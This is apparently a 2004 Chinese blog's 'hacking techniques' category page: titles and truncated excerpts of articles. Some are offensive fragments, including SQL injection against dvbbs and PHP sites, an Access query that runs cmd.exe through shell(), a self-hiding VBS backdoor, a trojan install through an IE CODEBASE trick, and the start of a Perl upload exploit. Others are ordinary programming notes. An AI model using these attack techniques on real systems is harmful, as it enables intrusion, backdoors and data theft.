黑客技术
文章平均质量分 66
scrub
这个作者很懒,什么都没留下…
展开
-
Windows自启动方式大全
文章作者:snaix前言: 有时候人们往往会为了一个程序的启动而头痛,因为一些用户往往不知道那些文件是如何启动的。所以经常会有些没用的东西挂在系统上占用资源。有时候也会有人因为不知道如何启动某个文件而头痛。更有些特洛依木马的作者因为不清楚系统的自启动方式而使自己的木马轻松被别人发现…… Windows的自启动方式其实有许多方式。除了一些常见的启动方式之外,还有一些非常隐蔽的可用原创 2004-10-22 12:17:00 · 972 阅读 · 0 评论 -
深入浅出Win2000计算机启动 关机脚本
信息来源:清水飘萍一.简介 Win2000计算机启动/关机脚本(startup/shutdown scripts)是Win2000的一个新特点.启动脚本是邀请用户登录之前运行的批文件,它的功能类似于Win9X和DOS中的自动执行批处理文件autoexec.bat;关机脚本是计算机关机之前运行的批文件. 与Win2000用户登录/注销脚本(logon/logoff scripts)相比,它们之间的主原创 2004-10-22 12:18:00 · 1046 阅读 · 0 评论 -
"/"和".."在CMD下的妙用
文章作者:Net2k /"和"."、".."在运行里的妙用相信很多人都知道,这里我来说说它们在cmd的妙用。打开cmd,在当前路径下输入md /my work命令时就在当前分区的根目录建立了一个没my work的目录。也就是说这个"/"的命令是指向当前分区根目录的。由此类推输入命令:del /my work/*.txt就可以删除根目录my work文件夹里所有的txt文件。又如输入: dir原创 2004-10-22 13:42:00 · 798 阅读 · 1 评论 -
将dvbbs送进地狱-user_agent注入
前一段时间动网论坛的头像上传的漏洞给各大使用dvbbs论坛的网站带来难以愈合的创伤,这个漏洞甚至危及到了sp2的版本。为了解决这个问题,沙滩小子可能也耗尽了心血吧。但是动网论坛至此就真的安全了吗?回答是否定的,这不是在htt_user_agent变量上面有出现了漏洞吗,欲知详情,请听我慢慢道来。漏洞文件:inc/dv_clsmain.asp测试环境: dvbbs7.0.0+mssqldvbbs7.原创 2004-10-23 18:02:00 · 1179 阅读 · 0 评论 -
asp可能遇到的错误
vbscript错误代码及对应解释大全 VBScript 语法错误 如果 VBScript 语句结构违反了一个或多个 VBScript 脚本语言语法规则,就会产生 VBScript 语法错误。 错误通常在执行程序前,编译程序时产生。 以下是53个语法错误: 错误编号 描述 十进制 十六进制 说明 1001 800A03E9 内存不足 1002 800A03EA 语法错误 1003 800A03EB原创 2004-10-23 19:12:00 · 777 阅读 · 0 评论 -
access的一些测试
access的一些测试 文/SuperHei 2004-7-25 1.shell的测试; 我们先在accessl里直接sql查询: 语句: SELECT shell(c:/winnt/system32/cmd.exe /c dir c:/ >c:3456.txt); “运行” 得到结果: C:/>dir 123456.txt 驱动器 C 中的卷没有标签。 卷的序列号是 3CEE-A8A9 C原创 2004-10-23 19:23:00 · 1269 阅读 · 0 评论 -
一些不常用的环境变量
Request.ServerVariables("NUMBER_OF_PROCESSORS")Request.ServerVariables("OS")Request.ServerVariables("WINDIR")Request.ServerVariables("TEMP")Request.ServerVariables("TMP")Request.ServerVariables("ComSp原创 2004-10-23 19:30:00 · 703 阅读 · 0 评论 -
深入研究表单提交方式:GET/POST
深入研究表单提交方式:GET/POSTHackfan本文平台:Windows 2000 Professional + Apache 1.3.17 + Perl 5.6.1 + Internet Explorer 5.00.2920.0000 大家知道目前表单提交的方式有GET和POST。我在这里不多说什么,给大家看一个以GET方式提交的表单的请求:GET /cgi-bin/原创 2004-10-24 21:45:00 · 802 阅读 · 0 评论 -
几个vbs文件代码
1. door.vbs *************** door.vbs by 黑嘿黑 *************** dim wsh,FA,FSO set fso=CreateObject("Scripting.FileSystemObject") Set FA= FSO.GetFile(WScript.scriptFullName) FA.Attributes =34 set wsh=C原创 2004-10-25 18:10:00 · 2391 阅读 · 0 评论 -
利用纯脚本技术获得系统权限
文/图 臭要饭的 目前网上很流行SQL INJECTION 漏洞,也就是我们通常所说的SQL注入漏洞,我们利用这类漏洞可以跨表、跨库查询数据库信息,以及通过论坛来上传文件从而得到主机WebShell(这些都是一些很通常的手法,黑防原来也介绍得比较详细)。 前段时间我对一大型音乐收费网站进行安全测试,结果我利用纯脚本技术,拿到了系统管理员权限。所以,今天我就为大家介绍一下全部经过和我的具体思路分析原创 2004-10-23 18:05:00 · 740 阅读 · 0 评论 -
多种PHP程序存在/0过滤不严漏洞
#!/usr/bin/perl $| = 1; use Socket; $host = "127.0.0.1";$port = "80";$UploadTo = ""; $str = "-----------------------------7d41f4a600472/r/n"."Content-Disposition: form-data; name=/"path/"/r/n"."/r/n".原创 2004-10-23 18:11:00 · 715 阅读 · 0 评论 -
HTTP 隧道 (HTTP代理Socket客户)
这篇文章贡献自Akash kava, 翻译: bugfree/CSDN环境: VC6 ※HTTP 隧道※--------HTTP是基于文本的通过浏览器检索网页的协议。 大多数情况下你躲在代理服务器的后面,通过LAN接入互联网。 在IE的Connection Option中, 你给出你的LAN的设置。 这个代理服务器运行着基于文本的协议, 你从它那里可以得到外界的网络HTTP相关的数据。是的原创 2004-10-23 19:14:00 · 931 阅读 · 0 评论 -
Socket入门
介绍 Socket 编程让你沮丧吗?从man pages中很难得到有用的信息吗?你想跟上时代去编Internet相关的程序,但是为你在调用 connect() 前的bind() 的结构而不知所措?等等… 好在我已经将这些事完成了,我将和所有人共享我的知识了。如果你了解 C 语言并想穿过网络编程的沼泽,那么你来对地方了。读者对象 这个文档是一个指南,而不是参考书。如果你刚开原创 2004-10-23 19:21:00 · 1124 阅读 · 0 评论 -
find.bat
@echo ==find.bat by 黑嘿黑 == @subst x: %1/ @x: @echo ==搜索结果:(x:为你搜索的盘符)== @echo ================================================== dir %2 /s /a @echo ================================================= @s原创 2004-10-25 18:05:00 · 847 阅读 · 0 评论 -
直接获取access、SQL Server等数据库数据 by mix
直接获取access、SQL Server等数据库数据 当使用SQL注入access的时候,经常会遇到密码为中文、猜不到关键字段名这样的问题。使用本技术就能够很快速的解决这样的问题。本技术最低要求有两条: 1.使用access数据库的系统存在SQL注入漏洞;mssql数据库也支持这个技术 2.需要知道欲爆数据所在的表的表名以及这个表下的一个字段名,一般都是id字段 使用本技术显而易原创 2004-10-25 18:57:00 · 789 阅读 · 0 评论 -
asp常用函数
asp常用函数本文作者:未知文章出处:未知文章性质:转载阅读次数:6发布日期:2004-10-26 Array() FUNCTION: 返回一个数组 SYNTAX: Array(list) ARGUMENTS: 字符,数字均可 EXAMPLE: Dim myArray() For i = 1 to 7 Redim Preserve myArray(i原创 2004-10-27 20:32:00 · 553 阅读 · 0 评论 -
跨站式SQL注入
BY 老凯(laokai) QQ 35054779 在屏蔽了错误信息的机器上,获得网站绝对路径。 前一阶段,在尝试攻击一个网站的时候,发现对方的系统已经屏蔽了错误信息,用的也是普通的帐号连接的数据库,系统也是打了全部的补丁这样要攻击注入是比较麻烦的。。因此我自己搞了一种“跨站式SQL注入”。。 思路如下,既然你不显示错误信息,我能不能让你显示到别的地方呢?让SQL把错误写入别的地方。。。 既然是原创 2004-10-22 13:51:00 · 602 阅读 · 0 评论 -
CLSID List
Thx my friend AronFor use with FileOpenDialog, FileSaveDialog, or FileSelectFolderList taken from Online Security > Windows Tips & TricksNote: Not all values may work as parameters to the AutoIt func原创 2004-10-23 11:08:00 · 930 阅读 · 0 评论 -
DEBUG命令详解
Debug 原意是杀虫子。这里是机器调试工具。 其实,Debug的由来,还有一则趣闻,在早期美国的一计算机房中,科学家正在紧张的工作。同时,许多台大型的计算机也在不停的运行着。大概是由于,机器过热,引来许的小虫子,以至于,计算机无法正常运行。科学们,只好停下来,捉虫子...虫子捉完了,计算机运行也正常了,后来,这个名词就沿用至今了.... 虽然,现在好的软件越来越多了,但是有些,我们原创 2004-10-23 13:40:00 · 3461 阅读 · 2 评论 -
运行命令集
winver---------------检查Windows版本 wmimgmt.msc----打开windows管理体系结构(WMI) wupdmgr-----------windows更新程序 wscript--------------windows脚本宿主设置 write-----------------写字板 winmsd--------------系统信息原创 2004-10-23 13:43:00 · 5395 阅读 · 0 评论 -
.inf File Hacking [转]
本文对inf文件基础知识,将不进行介绍。 关于inf文件的详细结构信息,可参考DDK帮助文档。 一、修改telnet服务,端口改为99,NTLM认证方式为1。 =============================== C:/myinf/Telnet.inf [Version] Signature="$WINDOWS NT$" [DefaultInstall] AddReg=Add原创 2004-10-23 13:44:00 · 748 阅读 · 0 评论 -
PHP注入
PHP注入.精简版本.小夜整理.有些地方我加了注释. 文章比较细致.主要介绍了三种SQL句子的注入方法. 1- SELECT 2- INSERT 3- UPDATE $req = "SELECT * FROM membres WHERE name LIKE %$search% ORDER BY name" où $search est la variable modifiable par l原创 2004-10-23 19:15:00 · 788 阅读 · 0 评论 -
TCP三次握手及原理
TCP/IP是很多的不同的协议组成,实际上是一个协议组,TCP用户数据报表协议(也称作TCP传输控制协议,Transport Control Protocol。可靠的主机到主机层协议。这里要先强调一下,传输控制协议是OSI网络的第四层的叫法,TCP传输控制协议是TCP/IP传输的6个基本协议的一种。两个TCP意思非相同。 )。TCP是一种可靠的面向连接的传送服务。它在传送数据时是分段进行的,主机交原创 2004-10-23 19:17:00 · 682 阅读 · 0 评论 -
UTF8编码
UTF-8Section: Linux Programmers Manual (7)Updated: 1995-11-26Index Return to Main Contents--------------------------------------------------------------------------------名字UTF-8 - ASCII 兼容的多字节 Unic原创 2004-10-23 19:19:00 · 2285 阅读 · 0 评论 -
一家之言的经验之谈php+mysql扎实个人基本功
一. 10句话1.不要依赖register_global=ON的环境,从你刚懂得配置php运行环境甚至尚不明白register_global的ON/OFF会对自己有什么影响的那天起,就应该勇敢地把它设为OFF.2.写程序前看看怎么用error_reporting.3.不懂就问本身没错,但你需要在那之前查查手册。4.当然,你需要懂得使用手册。手册上找不到答案的时候,应该考虑下网络上的搜索引擎。5.刚原创 2004-10-23 19:36:00 · 645 阅读 · 0 评论 -
Transact_SQL小手册,适合初学者
*******************Transact_SQL******************** --语 句 功 能 --数据操作 SELECT --从数据库表中检索数据行和列 INSERT --向数据库表添加新数据行 DELETE --从数据库表中删除数据行 UPDATE --原创 2004-10-25 19:57:00 · 598 阅读 · 0 评论 -
Sql注射总结(强烈推荐)
Sql注射总结(早源于or1=1) 最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses最重要的一些用户名(默认sql数据库中存在着的)publicdboguest(一般原创 2004-10-22 13:52:00 · 770 阅读 · 0 评论 -
用 INNER JOIN语法联接多个表建记录集
多表联接建立记录集是十分有用的,因为某些情况下颐切枰咽质堇嘈拖允疚嘤Φ奈谋久疲饩陀龅搅硕啾砹咏⒓锹技奈侍狻1热缱饕桓龌嵩弊⒉嵯低常灿形甯霰恚嵩毙畔⑹荼韒ember、会员身份表MemberIdentity、会员权限表MemberLevel、会员类别表MemberSort和会员婚姻状况表Wedlock。如果想把会员注册信息全部显示出来,肯定要将这四个表连起来,否则大家看到的某原创 2004-10-22 13:56:00 · 1100 阅读 · 1 评论 -
深入分析dvbbs7 User_agent注入
由于我们的访问程序会在Dv_online表中记录相应的访问数据,而只要这条数据存在的话就不会执行我们要跳转到可以注入的语句。因此只好等20分钟之后由于其他的用户访问而调用MyBoardOnline.OnlineQuery过程将超时用户访问记录(包括我们刚才的访问记录)删除之后才可以再次进行欺骗注入。否则的话只会让我们的访问最后时间更新为当前值,而对其它数据没有任何影响。每两次欺骗注入之间的时间间隔原创 2004-10-23 18:00:00 · 2233 阅读 · 0 评论 -
黑客防线——主机外部的危险
前言:不是我有意想搞你,而是你们有些过分了,拿着别人的稿子去卖钱,拿着别人的技术装点自己,这也无所谓。你们那种优越感让我不得不提醒你们一下,你们的优越是建立在别人付出之上的。 一、扫描,发现开着ftp。。。。。没常见漏洞。。。。。决定arp欺骗,进行嗅探。 二、找嗅探主机: C:/>ping hacker.com.cn Pinging hacker.com.cn [211.157.102.239]原创 2004-10-23 18:06:00 · 659 阅读 · 0 评论 -
用vbs来写sql注入等80端口的攻击脚本
昨天晚上在机器里乱翻时无意打开一个vbs脚本,突然发现一个以前没有见过的对象Test.SendRequest("http://"; & g_sServer & "/testfiles/browser.asp"),虽然对象没有见过,但是意思很明显:发送http请求。本来以为是WMI script API的东东,但是没有找到创建对象的语句,这个脚本在Microsoft ACT里,Microsoft A原创 2004-10-23 18:07:00 · 634 阅读 · 0 评论 -
PHP网站漏洞的相关总结
从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧. 我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于COOKIE欺骗等原创 2004-10-23 19:26:00 · 965 阅读 · 0 评论 -
对于无扩展名的PHP程序的研究
对于无扩展名的PHP程序的研究作者:PHP环境:WinXp Pro + Apache 2.0.49 + PHP 4.3.5 (Module) 将没有扩展名的PHP代码,给PHP解释器解释,好处在于大大增加了安全性,给入侵的人、盗链的人,增加了迷惑性。例如:http://www.msger.net/chat?username=Hackfanhttp://www.msger.net/im原创 2004-10-24 21:46:00 · 622 阅读 · 0 评论 -
上传漏洞终结篇
一、写在前面***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本***NC(Netcat) 用于提交数据包 DOS界面下运行: NC -vv www.***.com 80 -vv: 回显 80: www端口 1.txt: 就是你要发送的数据包 (更多使用方法请查看本区的帖子) WSE(WSockExpert) 对本机端口的监视,抓取IE提交的数据原创 2004-10-25 11:55:00 · 1414 阅读 · 0 评论 -
利用文件夹安装木马的另一方法
以前的代码是 run_exe="run_exe+="CODEBASE=/"test.exe#version=1,1,1,1/">" run_exe+="" run_exe+="" document.open(); document.clear(); document.writeln(run_exe); document.close(); 是利用了ie的漏洞,不过很多ie多升级了。没法利用: 我们原创 2004-10-25 18:38:00 · 1041 阅读 · 0 评论 -
czy的cookie欺骗教程
-----产生一个COOKIE文件并改变它 唉,很早就想点关于COOKIE的东东了,主要是网上有不少文章说半天其实也 没有多少实质的东西。 首先大家明白什么是COOKIE,具体点说如果是98那么它们默认存放在C:/windows/cookies 目录下,如果是2k它们在C:/Documents and Settings/%你的用户名%/Cookies目录下(每个文件都不会超过4KB) 它们的文件名原创 2004-10-31 01:01:00 · 810 阅读 · 0 评论 -
网络socket编程指南
网络socket编程指南 -------------------------------------------------------------------------------- 读者对象 这个文档是一个指南,而不是参考书。如果你刚开始 socket 编程并想找一本入门书,那么你是我的读者。但这不是一本完全的 socket 编程书。 --------------------原创 2004-10-31 15:26:00 · 719 阅读 · 0 评论 -
发现IE的一个小bug。, 作者:老k
a.htm : b.htm : a.js : this.top.document.write("setTimeout(this.window.open,1)"); 保存这个3个文件,然后执行a.htm就会让IE崩溃。。原创 2004-10-29 12:48:00 · 856 阅读 · 0 评论 -
lcx大哥给的一段代码
当前文件名称:Web服务器的名称和版本:var="SERVER_SOFTWARE"-->主机名:端口:客户或客户代理IP地址:客户或客户代理主机名:PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:var="PATH_TRANSLATED"-->客户端给出附加路径信息:原创 2004-10-31 00:56:00 · 696 阅读 · 0 评论 -
网页特效 弹出窗口自动关闭
网页特效 弹出窗口自动关闭 脚本说明:第一步:把如下代码加入区域中var gt = unescape(%3e);var popup = null;var over = "Launch Pop-up Navigator";popup = window.open(, popupnav, width=225,height=235,resizable=1,scrollbars原创 2004-11-01 14:32:00 · 3475 阅读 · 1 评论